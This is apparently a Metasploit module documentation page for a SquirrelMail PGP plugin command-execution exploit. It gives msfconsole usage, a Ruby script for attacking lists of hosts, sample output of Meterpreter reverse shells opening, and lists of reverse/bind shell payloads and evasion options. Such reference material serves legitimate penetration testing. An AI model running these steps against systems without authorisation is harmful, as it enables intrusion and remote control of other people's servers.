SquirrelMail PGP Plugin Command Execution (SMTP) - Metasploit


This page contains detailed information about how to use the exploit/unix/webapp/squirrelmail_pgp_plugin metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Module Overview


Name: SquirrelMail PGP Plugin Command Execution (SMTP)
Module: exploit/unix/webapp/squirrelmail_pgp_plugin
Source code: modules/exploits/unix/webapp/squirrelmail_pgp_plugin.rb
Disclosure date: 2007-07-09
Last modification time: 2020-10-02 17:38:06 +0000
Supported architecture(s): cmd
Supported platform(s): Unix
Target service / protocol: smtp, smtps
Target network port(s): 25, 465, 587, 2525, 25000, 25025
List of CVEs: CVE-2003-0990

This module exploits a command execution vulnerability in the PGP plugin of SquirrelMail. This flaw was found while quickly grepping the code after release of some information at http://www.wslabi.com/. Later, iDefense published an advisory .... Reading an email in SquirrelMail with the PGP plugin activated is enough to compromise the underlying server. Only "cmd/unix/generic" payloads were tested.

Module Ranking and Traits


Module Ranking:

  • manual: The exploit is unstable or difficult to exploit and is basically a DoS. This ranking is also used when the module has no use unless specifically configured by the user (e.g.: exploit/windows/smb/psexec). More information about ranking can be found here.

Basic Usage


Using squirrelmail_pgp_plugin against a single host

Normally, you can use exploit/unix/webapp/squirrelmail_pgp_plugin this way:

msf > use exploit/unix/webapp/squirrelmail_pgp_plugin
msf exploit(squirrelmail_pgp_plugin) > show targets
    ... a list of targets ...
msf exploit(squirrelmail_pgp_plugin) > set TARGET target-id
msf exploit(squirrelmail_pgp_plugin) > show options
    ... show and set options ...
msf exploit(squirrelmail_pgp_plugin) > exploit

Using squirrelmail_pgp_plugin against multiple hosts

But it looks like this is a remote exploit module, which means you can also engage multiple hosts.

First, create a list of IPs you wish to exploit with this module. One IP per line.

Second, set up a background payload listener. This payload should be the same as the one your squirrelmail_pgp_plugin will be using:

  1. Do: use exploit/multi/handler
  2. Do: set PAYLOAD [payload]
  3. Set other options required by the payload
  4. Do: set EXITONSESSION false
  5. Do: run -j

At this point, you should have a payload listening.

Next, create the following script. Notice you will probably need to modify the ip_list path, and payload options accordingly:

<ruby>
#
# Modify the path if necessary
#
ip_list = '/tmp/ip_list.txt'

File.open(ip_list, 'rb').each_line do |ip|
  print_status("Trying against #{ip}")
  run_single("use exploit/unix/webapp/squirrelmail_pgp_plugin")
  run_single("set RHOST #{ip}")
  run_single("set DisablePayloadHandler true")

  #
  # Set a payload that's the same as the handler.
  # You might also need to add more run_single commands to configure other
  # payload options.
  #
  run_single("set PAYLOAD [payload name]")

  run_single("run")
end
</ruby>

Next, run the resource script in the console:

msf > resource [path-to-resource-script]

And finally, you should see that the exploit is trying against those hosts similar to the following MS08-067 example:

msf > resource /tmp/exploit_hosts.rc
[*] Processing /tmp/exploit_hosts.rc for ERB directives.
[*] resource (/tmp/exploit_hosts.rc)> Ruby Code (402 bytes)
[*] Trying against 192.168.1.80

RHOST => 192.168.1.80
DisablePayloadHandler => true
PAYLOAD => windows/meterpreter/reverse_tcp
LHOST => 192.168.1.199

[*] 192.168.1.80:445 - Automatically detecting the target...
[*] 192.168.1.80:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] 192.168.1.80:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] 192.168.1.80:445 - Attempting to trigger the vulnerability...
[*] Sending stage (957999 bytes) to 192.168.1.80
[*] Trying against 192.168.1.109
RHOST => 192.168.1.109
DisablePayloadHandler => true
PAYLOAD => windows/meterpreter/reverse_tcp
LHOST => 192.168.1.199
[*] 192.168.1.109:445 - Automatically detecting the target...
[*] 192.168.1.109:445 - Fingerprint: Windows 2003 - Service Pack 2 - lang:Unknown
[*] 192.168.1.109:445 - We could not detect the language pack, defaulting to English
[*] 192.168.1.109:445 - Selected Target: Windows 2003 SP2 English (NX)
[*] 192.168.1.109:445 - Attempting to trigger the vulnerability...
[*] Meterpreter session 1 opened (192.168.1.199:4444 -> 192.168.1.80:1071) at 2016-03-02 19:32:49 -0600

[*] Sending stage (957999 bytes) to 192.168.1.109
[*] Meterpreter session 2 opened (192.168.1.199:4444 -> 192.168.1.109:4626) at 2016-03-02 19:32:52 -0600

Required Options


  • RHOSTS: The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'

  • RHOST: The SMTP server to send through

  • MAILTO: The TO address of the email

  • SUBJECT: Subject line of the email

Go back to menu.

Msfconsole Usage


Here is how the unix/webapp/squirrelmail_pgp_plugin exploit module looks in the msfconsole:

msf6 > use exploit/unix/webapp/squirrelmail_pgp_plugin

msf6 exploit(unix/webapp/squirrelmail_pgp_plugin) > show info

       Name: SquirrelMail PGP Plugin Command Execution (SMTP)
     Module: exploit/unix/webapp/squirrelmail_pgp_plugin
   Platform: Unix
       Arch: cmd
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Manual
  Disclosed: 2007-07-09

Provided by:
  Nicob <[email protected]>

Available targets:
  Id  Name
  --  ----
  0   SquirrelMail PGP plugin < 2.1

Check supported:
  No

Basic options:
  Name      Current Setting     Required  Description
  ----      ---------------     --------  -----------
  DATE                          no        Override the DATE: field with this value
  DOMAIN                        no        SMTP Domain to EHLO to
  MAILFROM  [email protected]  yes       The FROM address of the e-mail
  MAILTO                        yes       The TO address of the email
  PASSWORD                      no        SMTP Password for sending email
  RHOST                         yes       The SMTP server to send through
  RHOSTS                        yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RPORT     25                  yes       The SMTP server port (e.g. 25, 465, 587, 2525) (TCP)
  SUBJECT                       yes       Subject line of the email
  USERNAME                      no        SMTP Username for sending email
  VERBOSE                       no        Display verbose information

Payload information:
  Space: 1024
  Avoid: 0 characters

Description:
  This module exploits a command execution vulnerability in the PGP 
  plugin of SquirrelMail. This flaw was found while quickly grepping 
  the code after release of some information at 
  http://www.wslabi.com/. Later, iDefense published an advisory .... 
  Reading an email in SquirrelMail with the PGP plugin activated is 
  enough to compromise the underlying server. Only "cmd/unix/generic" 
  payloads were tested.

References:
  https://nvd.nist.gov/vuln/detail/CVE-2003-0990
  OSVDB (3178)
  http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=330
  http://www.wslabi.com/wabisabilabi/initPublishedBid.do?

Module Options


This is a complete list of options available in the unix/webapp/squirrelmail_pgp_plugin exploit:

msf6 exploit(unix/webapp/squirrelmail_pgp_plugin) > show options

Module options (exploit/unix/webapp/squirrelmail_pgp_plugin):

   Name      Current Setting     Required  Description
   ----      ---------------     --------  -----------
   DATE                          no        Override the DATE: field with this value
   DOMAIN                        no        SMTP Domain to EHLO to
   MAILFROM  [email protected]  yes       The FROM address of the e-mail
   MAILTO                        yes       The TO address of the email
   PASSWORD                      no        SMTP Password for sending email
   RHOST                         yes       The SMTP server to send through
   RHOSTS                        yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT     25                  yes       The SMTP server port (e.g. 25, 465, 587, 2525) (TCP)
   SUBJECT                       yes       Subject line of the email
   USERNAME                      no        SMTP Username for sending email
   VERBOSE                       no        Display verbose information

Exploit target:

   Id  Name
   --  ----
   0   SquirrelMail PGP plugin < 2.1

Advanced Options


Here is a complete list of advanced options supported by the unix/webapp/squirrelmail_pgp_plugin exploit:

msf6 exploit(unix/webapp/squirrelmail_pgp_plugin) > show advanced

Module advanced options (exploit/unix/webapp/squirrelmail_pgp_plugin):

   Name                    Current Setting  Required  Description
   ----                    ---------------  --------  -----------
   CHOST                                    no        The local client address
   CPORT                                    no        The local client port
   ConnectTimeout          10               yes       Maximum number of seconds to establish a TCP connection
   ContextInformationFile                   no        The information file that contains context information
   DisablePayloadHandler   false            no        Disable the handler code for the selected payload
   EnableContextEncoding   false            no        Use transient context when encoding payloads
   Proxies                                  no        A proxy chain of format type:host:port[,type:host:port][...]
   SSL                     false            no        Negotiate SSL/TLS for outgoing connections
   SSLCipher                                no        String for SSL cipher - "DHE-RSA-AES256-SHA" or "ADH"
   SSLVerifyMode           PEER             no        SSL verification method (Accepted: CLIENT_ONCE, FAIL_IF_NO_PEER_CERT, NONE, PEER)
   SSLVersion              Auto             yes       Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
   WORKSPACE                                no        Specify the workspace for this module

Exploit Targets


Here is a list of targets (platforms and systems) which the unix/webapp/squirrelmail_pgp_plugin module can exploit:

msf6 exploit(unix/webapp/squirrelmail_pgp_plugin) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   SquirrelMail PGP plugin < 2.1

Compatible Payloads


This is a list of possible payloads which can be delivered and executed on the target system using the unix/webapp/squirrelmail_pgp_plugin exploit:

msf6 exploit(unix/webapp/squirrelmail_pgp_plugin) > show payloads

Compatible Payloads
===================

   #   Name                                        Disclosure Date  Rank    Check  Description
   -   ----                                        ---------------  ----    -----  -----------
   0   payload/cmd/unix/bind_perl                                   normal  No     Unix Command Shell, Bind TCP (via Perl)
   1   payload/cmd/unix/bind_perl_ipv6                              normal  No     Unix Command Shell, Bind TCP (via perl) IPv6
   2   payload/cmd/unix/bind_ruby                                   normal  No     Unix Command Shell, Bind TCP (via Ruby)
   3   payload/cmd/unix/bind_ruby_ipv6                              normal  No     Unix Command Shell, Bind TCP (via Ruby) IPv6
   4   payload/cmd/unix/generic                                     normal  No     Unix Command, Generic Command Execution
   5   payload/cmd/unix/reverse                                     normal  No     Unix Command Shell, Double Reverse TCP (telnet)
   6   payload/cmd/unix/reverse_bash                                normal  No     Unix Command Shell, Reverse TCP (/dev/tcp)
   7   payload/cmd/unix/reverse_bash_telnet_ssl                     normal  No     Unix Command Shell, Reverse TCP SSL (telnet)
   8   payload/cmd/unix/reverse_perl                                normal  No     Unix Command Shell, Reverse TCP (via Perl)
   9   payload/cmd/unix/reverse_perl_ssl                            normal  No     Unix Command Shell, Reverse TCP SSL (via perl)
   10  payload/cmd/unix/reverse_python                              normal  No     Unix Command Shell, Reverse TCP (via Python)
   11  payload/cmd/unix/reverse_python_ssl                          normal  No     Unix Command Shell, Reverse TCP SSL (via python)
   12  payload/cmd/unix/reverse_ruby                                normal  No     Unix Command Shell, Reverse TCP (via Ruby)
   13  payload/cmd/unix/reverse_ruby_ssl                            normal  No     Unix Command Shell, Reverse TCP SSL (via Ruby)
   14  payload/cmd/unix/reverse_ssl_double_telnet                   normal  No     Unix Command Shell, Double Reverse TCP SSL (telnet)

Evasion Options


Here is the full list of possible evasion options supported by the unix/webapp/squirrelmail_pgp_plugin exploit in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 exploit(unix/webapp/squirrelmail_pgp_plugin) > show evasion

Module evasion options:

   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   TCP::max_send_size  0                no        Maxiumum tcp segment size.  (0 = disable)
   TCP::send_delay     0                no        Delays inserted before every send.  (0 = disable)

Go back to menu.


References


See Also


Check also the following modules related to this module:

Authors


  • Nicob <nicob[at]nicob.net>

Version


This page has been produced using Metasploit Framework version 6.2.23-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.